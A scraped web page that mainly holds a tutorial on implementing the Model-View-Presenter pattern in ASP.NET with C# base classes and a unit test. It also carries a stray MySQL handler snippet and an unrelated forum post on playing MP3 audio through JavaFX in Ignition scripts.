t->table->file->ha_rnd_init(1); while (!t->table->file->rnd_next(t->table->record[0])) { /* write record buffer to file */ } t->table->file->ha_rnd_end(); } This rough outline of my algorithm is missing the normal locking and other error handling (it's there, I just omitted it for brevity). I am pretty sure all of the storage engines support these handlerton methods. The only one I'm not sure about is NDB, but it appears to support them.
http://dev.mysql.com/worklog/task/?id=3570
CC-MAIN-2014-49
refinedweb
589
65.73
The full source code for this tutorial is available at my github at. MVP - the "Model-View-Presenter" pattern, like the MVC pattern, is used to separate business logic from the application and presentation layer. For a quick walkthrough of the MVP pattern, visit the following link: Now let's move on to how I've implemented this pattern for ASP.NET. The implementation consists of two base-classes and an item template for Visual Studio that you can drop in you template directory. The template will then show up with the name "Mvp form" when you choose to create a new Web item in your project. If you were to create a new form with the name Default.aspx you would get the following files. Default.aspx Default.aspx.cs Default.aspx.designer.cs Default.aspx.presenter.cs Default.aspx.view.cs The three first files you'll recognize as the standard .NET files for a webform. The two at the bottom are the additional files needed to conform to the MVP pattern. Now let's try to map these files against the MVP pattern and see which files implements what part. Default.aspx.cs - The view Default.aspx.view.cs - The view interface Default.aspx.presenter.cs - The presenter The model is your business logic and should not be grouped with the page. Let's now quickly examine the code that the item template generates for the different files and then build a simple example with it. Default.aspx.cs - The view public partial class Default : MvpView<DefaultPresenter, IDefault>, IDefault { protected void Page_Load(object sender, EventArgs e) {} } As we can see the code-behind now inherits the generic class MvpView instead of the standard System.Web.UI.Page. The generic base-class is supplied with the type of the presenter and the view interface, this allows the base-class to create a new presenter object in it's constructor ready to use by the view. public abstract class MvpView<TPresenter, TView> : Page where TPresenter : MvpPresenter<TView> { /// <summary> /// Gets/sets the current presenter for the view. /// </summary> public TPresenter Presenter { get ; set ; } /// <summary> /// Default constructor. Creates a new MVP view. /// </summary> public MvpView() : base() { if (!(this is TView)) throw new Exception("MvpView must implement the interface provider as generic TView type") ; // Create and initialize presenter Presenter = Activator.CreateInstance<TPresenter>() ; Presenter.View = (TView)((object)this) ; } } Default.aspx.view.cs - The view interface public interface IDefault { } As we can see the view interface doesn't contain anything at this point, but we'll get to this shortly when we create our simple example. Default.aspx.presenter.cs - The presenter public class DefaultPresenter : MvpPresenter<IDefault> { } The presenter inherits the generic class MvpPresenter to which we provide the same view interface as we provided to the view implementation. This allows for the base-class to contain a typed property for the current view object. public abstract class MvpPresenter<T> { /// <summary> /// Gets/sets the current view. /// </summary> public T View { get ; set ; } /// <summary> /// Default constructor. Creates a new presenter without an assigned view. /// </summary> public MvpPresenter() {} /// <summary> /// Creates a new presenter for the given view. /// </summary> /// <param name="view">The view</param> public MvpPresenter(T view) { View = view ; } } So, how about that example then? Sure, first of all we'll add a simple Label to our asp-page, let's call it lblName. No need to show that as you all know how to do it. Second of all let's add a property for the name in our view interface, like this: public interface IDefault { /// /// Gets/sets the current name. // string Name { get ; set ; } } In order for everything to compile, we need to add an implementation for this to our view: public partial class Default : MvpView<DefaultPresenter, IDefault>, IDefault { protected void Page_Load(object sender, EventArgs e) {} #region IDefault Members public string Name { get { return lblName.Text ; } set { lblName.Text = value ; } } #endregion } Ok, now what? Well now we simply add the business method in our presenter for fetching the name. In a real scenario this method would probably access a model which would load the name for the current user from a database somewhere. But for now, let's just set it to John Doe. public class DefaultPresenter : MvpPresenter<IDefault> { public void GetName() { View.Name = "John Doe" ; } } And last, but not least, let's call our presenter action from our view implementation: public partial class Default : MvpView<DefaultPresenter, IDefault>, IDefault { protected void Page_Load(object sender, EventArgs e) { if (!IsPostBack) Presenter.GetName() ; } #region IDefault Members public string Name { get { return lblName.Text ; } set { lblName.Text = value ; } } #endregion } Now why on earth did we write all that code? Yes indeed, why did we just add two extra files and added some complexity to our application architecture? The simple answer is testability. If you think about it we've just managed to extract all application logic from the code-behind to a separate class with a nice and clean API. We've also made sure that the presenter knows nothing about the class implementing the view interface, making sure we can supply it a pure container for test data. All of this together adds up to the fact that we can now easily create a test project in .NET and apply unit testing to our application, like so: public class DefaultTestView : IDefault { public string Name { get ; set ; } } [TestClass] public class DefaultTest { [TestMethod] public GetNameTest() { IDefault view = new DefaultTestView() ; DefaultPresenter presenter = new DefaultPresenter(view) ; presenter.GetName() ; Assert.AreEqual("John Doe", view.Name) ; } } I hope you found this tutorial useful.
http://cdn.dreamincode.net/forums/topic/232502-implementing-the-mvp-pattern-in-aspnet/
CC-MAIN-2018-05
refinedweb
921
55.64
SwiftUI. Is there life without NavigationView or a few words about the coordinator In the distant, distant times, when iOS was very small, developers, proudly called iOS developers, thought about customizing the navigation stack. Not that the nav stack was bad—it fit in perfectly with Apple’s worldview—but the nav bar was often a thorn in the side of users and designers. Therefore, the developers used a simple trick – they hid the panel in the application, and instead showed their own panel, with their own interface design, the controls of which were all tied to the same push and pop methods available to them out of the box. Over time, even Apple realized that it was impossible to live like this anymore, having released iOS 7… How much negativity spilled over the heads of developers… But those who learned how to customize the navigation bar got out of those dark times very worthily. …until SwiftUI flickered on the horizon. This is where the hint ended. Those developers who switched to SwiftUI sooner or later face the problem of unpredictable NavigationView behavior. This usually happens when you re-enter the displayed view in the navigation stack – for some reason, the navigation bar is shifted relative to the previously set position. And when using a container in conjunction with UIKit, it can lead to duplicate navigation. In addition, the navigation view causes a lot of problems when using other components. All this suggests that SwiftUI is too raw to be used in commercial projects. (For a moment, SwiftUI 4 has been announced for the moment and will be available in iOS16). Developers have been waiting for years for Apple to fix widely known glaring navigation issues, and hope has been raised with the announcement that NavigationView will be deprecated and SwiftUI 4 will introduce a new user-friendly navigation experience. The study of this issue showed that it was possible to write a little less code, but this could easily be done without Apple, just using switch instead of if, but the navigation problems did not disappear anywhere – all the same old problems appeared in the new navigation components. SwiftUI is too good to ignore because of its childhood illnesses. But, alas, many do it simply because they cannot get around the mistakes that have set their teeth on edge. Moreover, in professional communities there are often discussions about whether it is possible to do without NavigationView at all. Surprisingly, this is not easy, but very simple. But, on the way to a solution, some pebbles arise, without stepping over which it is impossible to move on. Those who overcome them do not even remember the difficulties that have arisen, the rest are waiting for a saving miracle from Apple, which, of course, is ready to lend a helping hand to those in need by making some changes regarding AnyView in Swift 5.7. True, all this will be available in the new iOS, and anyone who wants to continue working with an earlier version of the target will have to upgrade. In discussions about how to get around the “problem”, the concept of “Coordinator” often comes up. For those who have experience with UIKit, the coordinator pattern is familiar because it makes navigation easier and accessible from any part of the application. But those who are “born into the world” along with SwiftUI ask questions about what it is about, and do not understand how the discussed pattern can help solve the navigation problem in their application. In fact, when it comes to the coordinator in SwiftUI, it all comes down to a much simpler solution than what was described in relation to UIKit. Let’s say we want to navigate between the View chain. It can be any some View. But for simplicity, we will use colored views. The color of each view will be different from the other in the sequence of colors of the rainbow. The only feature of such a view will be the presence of the “Back” button. In this case, the transition to the extreme elements of the view stack is possible using simple calls from anywhere in the code: Coordinator.next(state: .root) Coordinator.next(state: .end) Navigating the stack is done using simple UIKit-style navigation commands: Coordinator.push(view: ColoredView(index: index + 1)) Coordinator.pop() Here index is the color number in the Colors array from red to magenta). Looks simple? It seems that the task of implementing the ColoredView itself is a trainee-level task. hidden text import SwiftUI struct ColoredView: View { var index: Int = 0 private (set) var colors:[Color] = [.red, .orange, .yellow, .green, .teal, .blue, .purple] var body: some View { ZStack { TitlePlace() HelloPlace() NextPlace() ModalaPlace() CoordinatorPlace() } .frame(maxWidth: .infinity, maxHeight: .infinity) .background(viewColor) } private var viewColor: Color { return colors[index] } private func HelloPlace() -> some View { VStack { Text("Hello, World!") Text("Index \(index)") } .foregroundColor(.white) } private func TitlePlace() -> some View { VStack { HStack { if index > 0 { Button { Coordinator.pop() } label: { Image(systemName: "arrow.left") .foregroundColor(.white) } .padding() } Spacer() } .frame(height: 44) .frame(maxWidth: .infinity) Spacer() } } private func NextPlace() -> some View { VStack { if index < colors.count - 1 { Button { Coordinator.push(view: ColoredView(index: index + 1)) } label: { Image(systemName: "arrow.right") .foregroundColor(.white) } } } .offset(y: 44) } private func ModalaPlace() -> some View { VStack { Button { Coordinator.modal(view: ModalView()) } label: { Text("SHOW MODAL") .foregroundColor(.white) .fontWeight(.heavy) } } .offset(y: 120) } private func CoordinatorPlace() -> some View { HStack { Button { Coordinator.next(state: .root) } label: { Text("ROOT") .foregroundColor(.white) .fontWeight(.heavy) } .padding() .border(.white, width: 1) Button { Coordinator.next(state: .end) } label: { Text("END") .foregroundColor(.white) .fontWeight(.heavy) } .padding() .border(.white, width: 1) } .offset(y: 200) } } Since the navigation stack is not the only way to navigate in the iOS world, in order not to go far, a modal window was also added to the implementation of the coordinator, which is displayed in full screen on top of any other window. In the proposed code, it is presented in its simplest form, but it will not be difficult to add shading, partial overlap, or blur to it. The implementation of ColoredView and ModalView differ only in the buttons in the window title, in accordance with common practice – the “Back” button returns to the previous view, and the button with a cross closes the modal window. Well, logically, the modal window closes when the final action is performed. A little more interesting, but not much more complicated, is the coordinator class. First, there is a generic ContainerView structure here. struct ContainerView : View { var view : AnyView init<V>(view: V) where V: View { self.view = AnyView(view) } var body: some View { view } } Secondly, the entire coordinator is made as a singleton. Singleton is not the best practice in mobile development, but in this case it allows you to simplify the code to show the really important parts. You can use Dependency Injection (DI), ServiceLocator or EnvirontmentObject to implement it. Any of these methods will work in a similar way. Thirdly, since we are doing all the manipulations in relation to SwiftUI, it would be unfair not to use MVVM, which easily allows us to bring reactivity to our application through ObservableObject. hidden text import SwiftUI let Coordinator = CoordinatorService.instance struct ContainerView : View { var view : AnyView init<V>(view: V) where V: View { self.view = AnyView(view) } var body: some View { view } } final class CoordinatorService: ObservableObject { enum State { case root case end } static let instance = CoordinatorService() @Published var modalVisibled = false @Published var modalView : ContainerView! @Published var container : ContainerView! private var stack = [ContainerView]() private init() { self.push(view: ColoredView(index: 0)) } func pop() { guard self.stack.count > 1 else { return } self.stack.remove(at: self.stack.count - 1) guard let last = self.stack.last else { return } self.container = last } func push<V: View>(view: V) { let containered = ContainerView(view: view) self.stack += [containered] self.container = containered } func modal<V: View>(view: V) { self.modalView = ContainerView(view: view) withAnimation { self.modalVisibled.toggle() } } func close() { withAnimation { self.modalVisibled.toggle() } } func next(state: State) { switch state { case .root : self.stack.removeAll() self.push(view: ColoredView()) case.end: self.push(view: ColoredView(index: 6)) } } } When creating an instance of the class, a view is pushed to the navigation stack, with index 0, which corresponds to the red color in the well-known mnemonic: “Every hunter wants to know where the pheasant sits.” In principle, it does not matter which view to push there. It is only important that there is at least some twist. EmptyView is not very suitable for this role, as it does not have interactive controls. The “push” and “modal” methods work with a generic view. Each of them takes a view, puts it in a convenient container, and then sets the container to the “observable” variables, which at the same time leads to a change in the navigation windows. Additionally, the “push” method pushes the container onto the navigation stack. The implementation of the stack can be done in “one hundred to five hundred” ways – the one given is quite obvious. The complimentary method “pop” removes the last element from the stack, after which it updates the last element on the stack through the “container” variable. Usually, in addition to the “pop” method, the “popToRoot” method is also added. But then it would be difficult to answer the following question: “And what does all this have to do with the coordinator pattern?” That’s just in order to allow you to move to any target view, the method was added next to which we pass our target. We describe the view itself as a choice of states using switch (Please do not confuse it with the state pattern – now it is not meant, although it could also be implemented and replaced with switch. But, within the framework of the article, switch is much easier to understand). Finally, we need to implement the ContextView from which our application starts. In it, the value of the container variable of the coordinator is displayed as content, and when the modal window is launched, it is displayed on top of the current view. import SwiftUI struct ContentView: View { @ObservedObject private var coordinator = Coordinator var body: some View { ZStack { coordinator.container.view if coordinator.modalVisibled { coordinator.modalView .transition(.move(edge: .bottom)) } } } } In general, that’s all. The demystification of the Coordinator is complete. The cherry on top is the visual hierarchy that is available for display in the XCode Debug View Hierarchy. After a full pass through all seven views, the visual hierarchy contains only the last rendered view with a single view controller. Compare with what usually happens when using UIKit. Implementation details can be discussed at telegram channel. The source code can be found here on GitHub.
https://prog.world/swiftui-is-there-life-without-navigationview-or-a-few-words-about-the-coordinator/?amp
CC-MAIN-2022-40
refinedweb
1,784
54.93
The Sound Player component and system.util.playSoundClip are wav file only. Since wav files are simply huge, compared to mp3, I decided to try out the JavaFX libraries. Here is my first runthrough. Verified on my Windows machine. No time to check on Linux yet, but since JavaFX is included on x86/x64, I don’t see why it wouldn’t work. I can say it will not work on ARM (like a Raspi), since Oracle dropped JavaFX support. Which is sad, because that’s what I really wanted it for… This example plays the theme from Bonanza, because, well, why not? Also added a tag to monitor to stop the playback early, if needed. from javafx.scene.media import AudioClip from time import sleep # Set path to audio file and tag used to stop playback. audioFilePath = '' stopFlagPath = '[default]Test/Audio/stopFlag' # Load up the audio stream plunk = AudioClip(audioFilePath) # Play the audio stream plunk.play() # Check every so often to see if the stopFlag is active, and stop playback if true. # Useful for long clips. while plunk.isPlaying() == 1: stopFlag = system.tag.read(stopFlagPath).value if stopFlag == 1: plunk.stop() else: sleep(0.3) # Reset the stop flag system.tag.write(stopFlagPath, 0)
https://forum.inductiveautomation.com/t/play-an-mp3-file-yes-yes-you-can/15219
CC-MAIN-2021-39
refinedweb
205
77.64